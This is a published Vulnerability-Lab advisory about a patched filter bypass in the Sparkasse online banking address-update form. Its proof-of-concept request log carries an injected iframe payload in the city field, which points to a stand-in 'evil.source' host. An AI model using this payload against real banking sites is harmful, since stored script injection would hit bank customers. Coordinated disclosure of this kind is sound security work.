Document Title:
===============
Sparkasse Online Banking - Filter Bypass Vulnerability


Date:
=====
2021-10-17


References:
===========
https://www.vulnerability-lab.com/get_content.php?id=2264


VL-ID:
=====
2264


Common Vulnerability Scoring System:
====================================
5.2


Vulnerability Class:
====================
Filter or Protection Mechanism Bypass


Introduction:
=============
The German Savings Banks Finance Group (Sparkassen-Finanzgruppe) is the most numerous sub-sector with 431 savings banks using 
the Sparkasse brand, 8 Landesbanken including the DekaBank using separate brands and 10 real-estate financing banks using the 
LBS brand. The Deutscher Sparkassen- und Giroverband (German Savings Banks and Clearing Association, DSGV) represents the 
interests of the Sparkassen-Finanzgruppe on a national and international level concerning law and the financial services 
industry. It also coordinates, promotes and harmonises the interests of Sparkassen.

(Copy of the Homepage: https://en.wikipedia.org/wiki/German_public_bank#Sparkassen )


Abstract:
=========
The vulnerability laboratory core research team discovered a filter bypass web vulnerability in the Sparkasse Online Banking web-application (cms).


Affected Product(s):
====================
Sparkasse
Product: Online Banking (Web-Application) [CMS]


Report-Timeline:
================
2020-09-01: Researcher Notification & Coordination (Security Researcher)
2020-09-02: Vendor Notification (Security Department)
2020-09-04: Vendor Response/Feedback (Security Department)
2021-10-01: Vendor Fix/Patch by Check (Service Developer Team)
2021-10-18: Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
The Sparkasse has installed a new function on its website to update address data. The user is asked whether all data 
from the registration process is still up-to-date. In the form itself it is possible to edit the location and other 
variables. But if you enter a non-existing city, the form will alternatively ask without secure parsing if the data 
should be accepted anyway. 

Attackers can now store their own payloads with the address data, which can lead directly to an execution in the 
interfaces. Normally, contents with special characters are blocked directly and do not appear in the database. 
Here profile information can be manipulated now in such a way that in forms or applications those as interfaces 
are used, the manipulated contract information of the profile is used. This allows vulnerabilities such as 
Cross Site Scripting or Server Side Request Forgery to be exploited to persistently manipulate the online 
banking application or linked services.

The validation class of the forms normally does not allow the transfer of the contents, because the function is 
new here the secure verification by the integration was forgotten for verification. All transferred content that 
requires content in HTML for e-mails, automated printing/writing or even for delivery in combination with the 
address can execute any codes.

Remark: Normally invalid content or wrong input is encoded or escaped directly by the rudimentary Java class. 
In this case the input is stored in the database, bypassing all validation mechanisms, and then in third modules 
individual manipulations with persistent attack vectors are called up. This can be the manipulation of the address 
data of an email or any content that is output by HTML / Javascript functions.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+]  Personendaten (Update)

Vulnerable Parameter(s):
[+] Ort

Affected Module(s):
[+] Hauptwohnsitz – (User Profil Data)


Proof of Concept:
=================
The filter bypass vulnerability can be exploited by remote attackers with low user account privileges and wihtout user interaction. 
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.


--- Session Logs (Demo Sparkasse Kassel) ---
Referenz:
*-sparkasse.de/de/home/login-online-banking/personendaten-aktualisieren.html
-
https://www.kasseler-sparkasse.de/if/neo.proxy/pdm/neo/?services=pdm.anschriftpruefen
Host: www.kasseler-sparkasse.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
Content-Length: 1481
Origin: https://www.kasseler-sparkasse.de
Connection: keep-alive
Referer: https://www.kasseler-sparkasse.de/de/home/login-online-banking/personendaten-aktualisieren.html?n=true
Cookie: JSESSIONID=0000n1KJiK2E8f6NnCYAFQjLIyf:b3cb3f1c5; IF6CONTEXT=SVBTVEFOREFSRDo1MjA1MDM1MzpkZTpJRjpmYWxzZTprYXNzZWxlci1zcGs=; 
IFCLONE=b3cb3f1c5; IF_SPKDE_CHECK=SPKDE_CHECK
{"clientRequestId":"27466cff-63fb-40df-b11e-f2510333c4c0","requests":[{"id":"0","service":"pdm.anschriftpruefen","data":{"F_99973$$"
:"Seitzemabacherweg","F_25022$$":"22","F_18080$$":"34251","F_14553$$":"Vellmar"><iframe src="evil.source">"},"ctx":{"F_83065$$":
"68806169016169797067"}}],"context":{"F_63959$$":{"F_83065$$":"68806169016169797067","F_42651$$":{"F_45023$$":
["5902-53-28-01.53.54.888000"],"F_61844$$":{"F_62705$$":"NEO_WF","F_68255$$":1597657015770,"F_1602$$":-1,"F_21926$$":
"W_PDM_GPS_NEO_PERSDAT_AKT_START","F_54572$$":"I_PDM_WF_GPS_NEO_PDA_START","F_73309$$":"n02001.004.37326.1614237"},
"F_54716$$":{"F_47161$$":"XK7gNYm1OC1X","F_14066$$":"XWq8tyPCKYVgK1n7doCY6rBKm","F_43514$$":"vNXOzIQDnDoZNeC8eRhqkf3sE",
"F_27084$$":"joZoZk42gl7i","F_38158$$":"zweSauR0pgYs4A"}},"F_347$$":"pdm-1595467796239-5d07250f74054941bbf25facce8dc156",
"F_93388$$":[]},"F_11593$$":{"F_93585$$":"0-9a9ccedb-50bc-4c6e-86a8-4de36dd493f0","F_65941$$":"5498-50-13-01.50.03.293000",
"F_43610$$":"3978-47-02-08.47.12.843000","F_78819$$":"4190-03-05-12.19.17.405813","F_70165$$":"8958024679860394","F_2785$$":
"2FF81A0603AB17FC0001004","F_74914$$":"vR2428n","F_80587$$":"7M3GtAJNSl3","F_7860$$":"058","F_5646$$":"IKS02",
"F_96928$$":"7169-14-27-05.14.20.119000","F_45405$$":"W_PDM_GPS_NEO_PERSDAT_AKT_START","F_93384$$":"I_PDM_WF_GPS_NEO_PDA_START",
"F_58231$$":"A_PDM_NEO_PERSDAT_AKT_IF","F_12460$$":"W_PDM_NEO_PERSDAT_AKT_IF","F_79272$$":
"I_PDM_A_NEO_PERSDAT_AKT"},"F_53847$$":"g3Q3KmlA0J0GFEtqUi1oUUHS2dI8qh"}}
-
POST: HTTP/1.1 200 OK
Date: Mon, 17 Aug 2020 09:39:21 GMT
Server: Apache
X-UA-Compatible: IE=edge
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Cache-Control: no-store
Last-Modified: Mon, 17 Aug 2020 09:39:21 GMT
Content-Language: de-DE
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 942
Content-Type: application/json; charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


Remark: Normally invalid content or wrong input is encoded or escaped directly by the java class. Here it is so 
that the input is stored in the database past all validation mechanisms and then in third modules to cause individual 
manipulations with persistent attack vectors. (Preview: 1.png, 2.png, 3.png)


Solution:
=========
1. Restriction of input fields by limiting special characters
2. Validation and secure encode of the input for transmission via POST method
3. Cleaning before output when displaying the contents in the different areas
4. Alternativ a web-firewall or filter mechanism can be implemented to prevent and identify further attacks of the same characteristics.


Risk:
=====
The security risk of the filter bypass vulnerability in the sparkasse online banking web-application is estimated as medium.


Credits:
========
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™